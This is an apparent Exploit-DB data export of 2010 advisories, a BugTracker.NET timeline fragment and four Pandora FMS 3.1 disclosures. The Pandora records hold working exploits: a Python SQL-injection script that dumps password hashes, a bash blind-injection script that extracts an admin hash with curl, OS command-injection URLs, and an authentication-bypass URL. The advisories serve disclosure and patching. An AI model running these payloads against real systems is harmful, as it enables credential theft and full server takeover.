BugTracker team of the\r\nvulnerability, setting the estimated publication date of the advisory to\r\nDecember 20th 2010.\r\n\r\n. 2010-11-29:\r\nThe BugTracker team asks Core for a technical description of the\r\nvulnerability.\r\n\r\n. 2010-11-29:\r\nTechnical details sent to BugTracker team.\r\n\r\n. 2010-11-29:\r\nThe BugTracker team acknowledges the report and notifies they will fix\r\nall issues in 1 or 2 working days.\r\n\r\n. 2010-11-30:\r\nThe BugTracker team notifies that a patched version is publicly\r\navailable at Sourceforge and Codeplex.\r\n\r\n. 2010-11-30:\r\nThe advisory CORE-2010-1109 is published.\r\n\r\n\r\n9. *References*\r\n\r\n[1] BugTracker.NET official website:\r\n[http://ifdefined.com/bugtrackernet.html].\r\n[2] BugTracker.NET Source Forge project:\r\n[http://sourceforge.net/projects/btnet/].\r\n\r\n\r\n10. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\n[http://corelabs.coresecurity.com].\r\n\r\n\r\n11. *About Core Security Technologies*\r\n\r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\n[http://www.coresecurity.com].\r\n\r\n\r\n12. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2010 Core Security\r\nTechnologies and (c) 2010 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]\r\n\r\n\r\n13. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\n[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].", "sourceHref": "https://www.exploit-db.com/download/15653", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-08-13T22:59:41", "description": "", "cvss3": {}, "published": "2010-11-30T00:00:00", "type": "exploitdb", "title": "Pandora Fms 3.1 - SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2010-4280", "CVE-2010-4280"], "modified": "2010-11-30T00:00:00", "id": "EDB-ID:15641", "href": "https://www.exploit-db.com/exploits/15641", "sourceData": "[+] Introduction\r\n\r\nPandora FMS (for Pandora Flexible Monitoring System) is a software\r\nsolution for monitoring computer networks. It allows monitoring in a\r\nvisual way the status and performance of several parameters from\r\ndifferent operating systems, servers, applications and hardware systems\r\nsuch as firewalls, proxies, databases, web servers or routers.\r\n\r\nIt can be deployed in almost any operating system. It features remote\r\nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use\r\nagents. An agent is available for each platform. It can also monitor\r\nhardware systems with a TCP/IP stack, such as load balancers, routers,\r\nnetwork switches, printers or firewalls.\r\n\r\nThis software has several servers that process and get information from\r\ndifferent sources, using WMI for gathering remote Windows information, a\r\npredictive server, a plug-in server which makes complex user-defined\r\nnetwork tests, an advanced export server to replicate data between\r\ndifferent sites of Pandora FMS, a network discovery server, and an SNMP\r\nTrap console.\r\n\r\nReleased under the terms of the GNU General Public License, Pandora FMS\r\nis free software.\r\n\r\n3) SQL Injection - CVE-2010-4280 - CVSS 8.5/10\r\n\r\nThe parameter id_group when get_agents_group_json is equal to 1 is\r\nvulnerable to SQL Injection attacks.\r\n\r\nPoC:\r\nhttp://host/pandora_console/ajax.php?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario\r\n\r\n\r\nExploit:\r\n\r\n# Pandora Flexible Monitoring System SQL Injection PoC\r\n# Juan Galiana Lara\r\n# Gets the list of users and password from the database\r\n#\r\n#configure cookie&host before use it\r\n#usage\r\n#python sqlinj_users.py\r\n#admin:75b756ff2785ea8bb9ae02c13b6a71f1\r\n#...\r\n\r\nimport json\r\nimport urllib2\r\n\r\nheaders = {\"Cookie\": \"PHPSESSID=a4s3nf1tqv2fau8s6qhi6rutp9dahe9o\"}\r\n\r\nurl = \"http://HOST/pandora_console/ajax.php\";\r\nurl+=\r\n\"?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1\"\r\nurl+=\r\n\"/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario\"\r\n\r\nreq = urllib2.Request(url,headers=headers)\r\nresp = urllib2.urlopen(req)\r\n\r\nusers = json.read(resp.read())\r\nfor user in users:\r\n print(user[\"id_agente\"]+\":\"+user[\"nombre\"])\r\n\r\n\r\nThe fix to these kind of issues was the implementation of a generic\r\nfilter against sql injection. A proper fix is planned for a major version.\r\n\r\n\r\n[+] Impact\r\n\r\nAn attacker can execute commands of the operating system, inject remote\r\ncode in the context of the application, get arbitrary files from the\r\nfilesystem or extract any data of the database including passwords and\r\nconfidential information about the monitored network/systems. Also it is\r\npossible to bypass the authentication or scale privileges to became\r\nadmin, gaining full control of the web application and web server. These\r\nvulnerabilities have a high impact to the confidentiality, integrity,\r\nand availability of the system.\r\n\r\n\r\n[+] Systems affected\r\n\r\nVersions prior and including 3.1 of Pandora FMS are affected\r\n\r\n\r\n[+] Solution\r\n\r\nApply the security fix for version 3.1:\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\r\n\r\n\r\nOr upgrade to version 3.1.1 from\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/\r\n\r\n\r\n[+] Timeline\r\n\r\nAgo 2010: First contact to vendor\r\nAgo 2010: Confirmation of vendor\r\nSept 2010: Second contact: SQL Injection vulnerabilities\r\nSept 2010: Confirmation that the fix will be released on October\r\nOct 2010: PandoraFMS security patch for 3.1 version released\r\nOct 2010: Request for CVE numbers\r\nNov 2010: PandoraFMS version 3.1.1 released\r\nNov 2010: Disclosure of this advisory\r\n\r\n\r\n[+] References\r\n\r\nOfficial PandoraFMS site: http://pandorafms.org/\r\nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/\r\nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS\r\nCommon Vulnerability Scoring System (CVSS) v2 calculator:\r\nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\r\nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/\r\n\r\n\r\n[+] Credits\r\n\r\nThese vulnerabilities has been discovered by Juan Galiana Lara -\r\n@jgaliana - http://juangaliana.blogspot.com/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy\r\nYbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s\r\nIVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9\r\nWIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4\r\ncC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP\r\nJPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP\r\n8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4\r\n7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH\r\npARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5\r\nyNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4\r\noBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF\r\nsn9vRJk4gc/PozOXDjC3\r\n=WmOh\r\n-----END PGP SIGNATURE-----", "sourceHref": "https://www.exploit-db.com/download/15641", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-13T22:59:41", "description": "", "cvss3": {}, "published": "2010-11-30T00:00:00", "type": "exploitdb", "title": "Pandora Fms 3.1 - Blind SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2010-4280", "CVE-2010-4280"], "modified": "2010-11-30T00:00:00", "id": "EDB-ID:15642", "href": "https://www.exploit-db.com/exploits/15642", "sourceData": "[+] Introduction\r\n\r\nPandora FMS (for Pandora Flexible Monitoring System) is a software\r\nsolution for monitoring computer networks. It allows monitoring in a\r\nvisual way the status and performance of several parameters from\r\ndifferent operating systems, servers, applications and hardware systems\r\nsuch as firewalls, proxies, databases, web servers or routers.\r\n\r\nIt can be deployed in almost any operating system. It features remote\r\nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use\r\nagents. An agent is available for each platform. It can also monitor\r\nhardware systems with a TCP/IP stack, such as load balancers, routers,\r\nnetwork switches, printers or firewalls.\r\n\r\nThis software has several servers that process and get information from\r\ndifferent sources, using WMI for gathering remote Windows information, a\r\npredictive server, a plug-in server which makes complex user-defined\r\nnetwork tests, an advanced export server to replicate data between\r\ndifferent sites of Pandora FMS, a network discovery server, and an SNMP\r\nTrap console.\r\n\r\nReleased under the terms of the GNU General Public License, Pandora FMS\r\nis free software.\r\n\r\n4) Blind SQL Injection - CVE-2010-4280 - CVSS: 8.5/10\r\n\r\nThe parameter group_id of operation/agentes/estado_agente.php is\r\nvulnerable to blind sql injection.\r\n\r\n\r\nPoC:\r\nhttp://host/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=24%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,1,1%29%29=49%20and%20id_user=0x61646d696e%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281\r\n\r\n\r\nExploit:\r\n\r\n#!/bin/bash\r\n# Pandora Flexible Monitoring System Blind SQL Injection PoC\r\n# Juan Galiana Lara\r\n# Gets the md5 hash password from a specific user\r\n#\r\n#configure host,cookie&group_id before use it\r\n#usage\r\n#$ ./getpassword.sh\r\n#74b444ff2785ea8bb9ae02c13b6a71f1\r\n\r\nHOST=\"HOST\"\r\nTARGET_USER=\"0x61646d696e\" #admin\r\nPATTERN=\"Interval\"\r\nCOOKIE=\"rq842tci6e5ib7t918c6sv1ml4\"\r\nCHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v\r\nw x y z)\r\nGROUP_ID=2\r\n\r\nj=1\r\nwhile [[ $j -lt 33 ]]; do\r\n i=0\r\n while [[ $i -lt ${#CHARSET[ () ]} ]]; do\r\n c=$(printf '%d' \"'${CHARSET[$i]}\")\r\n\r\nURL=\"http://$HOST/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=$GROUP_ID%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,$j,1%29%29=$c%20and%20id_user=$TARGET_USER%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281\";;\r\n curl $URL --cookie \"PHPSESSID=$COOKIE\" 2> /dev/null | grep -q\r\n$PATTERN;\r\n if [ $? -eq 0 ]; then echo -n ${CHARSET[$i]}; break; fi;\r\n let i++\r\n done;\r\n if [[ $i -eq ${#CHARSET[ () ]} ]]; then echo \"Something went wrong!\";\r\nexit 1; fi\r\n let j++;\r\ndone\r\necho\r\nexit 0\r\n\r\n\r\nThe fix to these kind of issues was the implementation of a generic\r\nfilter against sql injection. A proper fix is planned for a major version.\r\n\r\n\r\n[+] Impact\r\n\r\nAn attacker can execute commands of the operating system, inject remote\r\ncode in the context of the application, get arbitrary files from the\r\nfilesystem or extract any data of the database including passwords and\r\nconfidential information about the monitored network/systems. Also it is\r\npossible to bypass the authentication or scale privileges to became\r\nadmin, gaining full control of the web application and web server. These\r\nvulnerabilities have a high impact to the confidentiality, integrity,\r\nand availability of the system.\r\n\r\n\r\n[+] Systems affected\r\n\r\nVersions prior and including 3.1 of Pandora FMS are affected\r\n\r\n\r\n[+] Solution\r\n\r\nApply the security fix for version 3.1:\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\r\n\r\n\r\nOr upgrade to version 3.1.1 from\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/\r\n\r\n\r\n[+] Timeline\r\n\r\nAgo 2010: First contact to vendor\r\nAgo 2010: Confirmation of vendor\r\nSept 2010: Second contact: SQL Injection vulnerabilities\r\nSept 2010: Confirmation that the fix will be released on October\r\nOct 2010: PandoraFMS security patch for 3.1 version released\r\nOct 2010: Request for CVE numbers\r\nNov 2010: PandoraFMS version 3.1.1 released\r\nNov 2010: Disclosure of this advisory\r\n\r\n\r\n[+] References\r\n\r\nOfficial PandoraFMS site: http://pandorafms.org/\r\nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/\r\nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS\r\nCommon Vulnerability Scoring System (CVSS) v2 calculator:\r\nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\r\nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/\r\n\r\n\r\n[+] Credits\r\n\r\nThese vulnerabilities has been discovered by Juan Galiana Lara -\r\n@jgaliana - http://juangaliana.blogspot.com/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy\r\nYbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s\r\nIVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9\r\nWIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4\r\ncC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP\r\nJPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP\r\n8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4\r\n7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH\r\npARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5\r\nyNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4\r\noBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF\r\nsn9vRJk4gc/PozOXDjC3\r\n=WmOh\r\n-----END PGP SIGNATURE-----", "sourceHref": "https://www.exploit-db.com/download/15642", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-13T21:17:29", "description": "", "cvss3": {}, "published": "2010-11-30T00:00:00", "type": "exploitdb", "title": "Pandora Fms 3.1 - OS Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2010-4278", "CVE-2010-4278"], "modified": "2010-11-30T00:00:00", "id": "EDB-ID:15640", "href": "https://www.exploit-db.com/exploits/15640", "sourceData": "[+] Introduction\r\n\r\nPandora FMS (for Pandora Flexible Monitoring System) is a software\r\nsolution for monitoring computer networks. It allows monitoring in a\r\nvisual way the status and performance of several parameters from\r\ndifferent operating systems, servers, applications and hardware systems\r\nsuch as firewalls, proxies, databases, web servers or routers.\r\n\r\nIt can be deployed in almost any operating system. It features remote\r\nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use\r\nagents. An agent is available for each platform. It can also monitor\r\nhardware systems with a TCP/IP stack, such as load balancers, routers,\r\nnetwork switches, printers or firewalls.\r\n\r\nThis software has several servers that process and get information from\r\ndifferent sources, using WMI for gathering remote Windows information, a\r\npredictive server, a plug-in server which makes complex user-defined\r\nnetwork tests, an advanced export server to replicate data between\r\ndifferent sites of Pandora FMS, a network discovery server, and an SNMP\r\nTrap console.\r\n\r\nReleased under the terms of the GNU General Public License, Pandora FMS\r\nis free software.\r\n\r\n2) OS Command Injection - CVE-2010-4278 - CVSS 9/10\r\n\r\nThe layout parameter in file operation/agentes/networkmap.php is not\r\nproperly filtered and allows an attacker to inject OS commands.\r\n\r\nSnippet of vulnerable code (file operation/agentes/networkmap.php):\r\n\r\n32 $layout = (string) get_parameter ('layout', 'radial');\r\n...\r\n137 $filename_map = $config[\"attachment_store\"].\"/networkmap_\".$layout;\r\n138 $filename_img = \"attachment/networkmap_\".$layout.\"_\".$font_size;\r\n139 $filename_dot = $config[\"attachment_store\"].\"/networkmap_\".$layout;\r\n...\r\n162 $cmd = \"$filter -Tcmapx -o\".$filename_map.\" -Tpng\r\n- -o\".$filename_img.\" \".$filename_dot;\r\n163 $result = system ($cmd);\r\n\r\nPoC:\r\n\r\nhttp://servername/pandora_console/index.php?login=1&login=1&sec=estado&sec2=operation/agentes/networkmap&refr=0&layout=1;uname%20-a;\r\nhttp://servername/pandora_console/index.php?login=1&sec=estado&sec2=operation/agentes/networkmap&refr=0&layout=1;id;\r\n\r\nIf we use vulnerability #1 (that permits bypass the authentication\r\nsystem and login as admin) with this issue, the CVSS will be 10/10.\r\n\r\n\r\n[+] Impact\r\n\r\nAn attacker can execute commands of the operating system, inject remote\r\ncode in the context of the application, get arbitrary files from the\r\nfilesystem or extract any data of the database including passwords and\r\nconfidential information about the monitored network/systems. Also it is\r\npossible to bypass the authentication or scale privileges to became\r\nadmin, gaining full control of the web application and web server. These\r\nvulnerabilities have a high impact to the confidentiality, integrity,\r\nand availability of the system.\r\n\r\n\r\n[+] Systems affected\r\n\r\nVersions prior and including 3.1 of Pandora FMS are affected\r\n\r\n\r\n[+] Solution\r\n\r\nApply the security fix for version 3.1:\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\r\n\r\n\r\nOr upgrade to version 3.1.1 from\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/\r\n\r\n\r\n[+] Timeline\r\n\r\nAgo 2010: First contact to vendor\r\nAgo 2010: Confirmation of vendor\r\nSept 2010: Second contact: SQL Injection vulnerabilities\r\nSept 2010: Confirmation that the fix will be released on October\r\nOct 2010: PandoraFMS security patch for 3.1 version released\r\nOct 2010: Request for CVE numbers\r\nNov 2010: PandoraFMS version 3.1.1 released\r\nNov 2010: Disclosure of this advisory\r\n\r\n\r\n[+] References\r\n\r\nOfficial PandoraFMS site: http://pandorafms.org/\r\nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/\r\nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS\r\nCommon Vulnerability Scoring System (CVSS) v2 calculator:\r\nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\r\nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/\r\n\r\n\r\n[+] Credits\r\n\r\nThese vulnerabilities has been discovered by Juan Galiana Lara -\r\n@jgaliana - http://juangaliana.blogspot.com/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy\r\nYbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s\r\nIVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9\r\nWIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4\r\ncC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP\r\nJPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP\r\n8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4\r\n7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH\r\npARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5\r\nyNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4\r\noBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF\r\nsn9vRJk4gc/PozOXDjC3\r\n=WmOh\r\n-----END PGP SIGNATURE-----", "sourceHref": "https://www.exploit-db.com/download/15640", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-13T22:59:42", "description": "", "cvss3": {}, "published": "2010-11-30T00:00:00", "type": "exploitdb", "title": "Pandora FMS 3.1 - Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2010-4279", "CVE-2010-4279"], "modified": "2010-11-30T00:00:00", "id": "EDB-ID:15639", "href": "https://www.exploit-db.com/exploits/15639", "sourceData": "[+] Introduction\r\n\r\nPandora FMS (for Pandora Flexible Monitoring System) is a software\r\nsolution for monitoring computer networks. It allows monitoring in a\r\nvisual way the status and performance of several parameters from\r\ndifferent operating systems, servers, applications and hardware systems\r\nsuch as firewalls, proxies, databases, web servers or routers.\r\n\r\nIt can be deployed in almost any operating system. It features remote\r\nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use\r\nagents. An agent is available for each platform. It can also monitor\r\nhardware systems with a TCP/IP stack, such as load balancers, routers,\r\nnetwork switches, printers or firewalls.\r\n\r\nThis software has several servers that process and get information from\r\ndifferent sources, using WMI for gathering remote Windows information, a\r\npredictive server, a plug-in server which makes complex user-defined\r\nnetwork tests, an advanced export server to replicate data between\r\ndifferent sites of Pandora FMS, a network discovery server, and an SNMP\r\nTrap console.\r\n\r\nReleased under the terms of the GNU General Public License, Pandora FMS\r\nis free software.\r\n\r\n\r\n[+] Description and Proof of Concept\r\n\r\n\r\n1) Authentication bypass - CVE-2010-4279 - CVSS: 10/10\r\n\r\nAn attacker could access to any account user, including admin, using the\r\n\"hash login\" authentication process. This kind of authentication method\r\nworks providing a username and a hash. The issue could be exploited\r\nremotely providing a username and the md5 of it when\r\n$config['loginhash_pwd'] is empty, that in fact is the default\r\nconfiguration.\r\n\r\nSnippet of vulnerable code in index.php:\r\n\r\n136 // Hash login process\r\n137 if (! isset ($config['id_user']) && isset ($_GET[\"loginhash\"])) {\r\n138 $loginhash_data = get_parameter(\"loginhash_data\", \"\");\r\n139 $loginhash_user = get_parameter(\"loginhash_user\", \"\");\r\n140\r\n141 if ($loginhash_data ==\r\nmd5($loginhash_user.$config[\"loginhash_pwd\"])) {\r\n142 logon_db ($loginhash_user, $_SERVER['REMOTE_ADDR']);\r\n143 $_SESSION['id_usuario'] = $loginhash_user;\r\n144 $config[\"id_user\"] = $loginhash_user;\r\n\r\n\r\n\r\nProof of concept:\r\n\r\nhttp://servername/pandora_console/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1\r\n\r\nGot it! admin! :)\r\n\r\nBy default, any installation of this software allows unauthenticated\r\nattackers to perform an authentication bypass and a privilege escalation\r\nto admin.\r\n\r\n\r\n1.1) Additionally, a manual modification in order to use the hash_hmac\r\nfunction instead of the weak statement md5 ( $string . $KEY) is\r\nencouraged for security purposes.\r\n\r\nSnippet of code (index.php, version 3.1.1):\r\n\r\n145 // Hash login process\r\n(...)\r\n150 if ($config[\"loginhash_pwd\"] != \"\" && $loginhash_data ==\r\nmd5($loginhash_user.$config[\"loginhash_pwd\"])) {\r\n\r\nIn line 150, use\r\nhash_hmac(\"sha256\",$loginhash_user,$config[\"loginhash_pwd\"]), instead of\r\nmd5($lioginhash_user.$config[\"loginhash_pwd\"])\r\n\r\n\r\n[+] Impact\r\n\r\nAn attacker can execute commands of the operating system, inject remote\r\ncode in the context of the application, get arbitrary files from the\r\nfilesystem or extract any data of the database including passwords and\r\nconfidential information about the monitored network/systems. Also it is\r\npossible to bypass the authentication or scale privileges to became\r\nadmin, gaining full control of the web application and web server. These\r\nvulnerabilities have a high impact to the confidentiality, integrity,\r\nand availability of the system.\r\n\r\n\r\n[+] Systems affected\r\n\r\nVersions prior and including 3.1 of Pandora FMS are affected\r\n\r\n\r\n[+] Solution\r\n\r\nApply the security fix for version 3.1:\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\r\n\r\n\r\nOr upgrade to version 3.1.1 from\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/\r\n\r\n\r\n[+] Timeline\r\n\r\nAgo 2010: First contact to vendor\r\nAgo 2010: Confirmation of vendor\r\nSept 2010: Second contact: SQL Injection vulnerabilities\r\nSept 2010: Confirmation that the fix will be released on October\r\nOct 2010: PandoraFMS security patch for 3.1 version released\r\nOct 2010: Request for CVE numbers\r\nNov 2010: PandoraFMS version 3.1.1 released\r\nNov 2010: Disclosure of this advisory\r\n\r\n\r\n[+] References\r\n\r\nOfficial PandoraFMS site: http://pandorafms.org/\r\nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/\r\nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS\r\nCommon Vulnerability Scoring System (CVSS) v2 calculator:\r\nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\r\nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/\r\n\r\n\r\n[+] Credits\r\n\r\nThese vulnerabilities has been discovered by Juan Galiana Lara -\r\n@jgaliana - http://juangaliana.blogspot.com/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 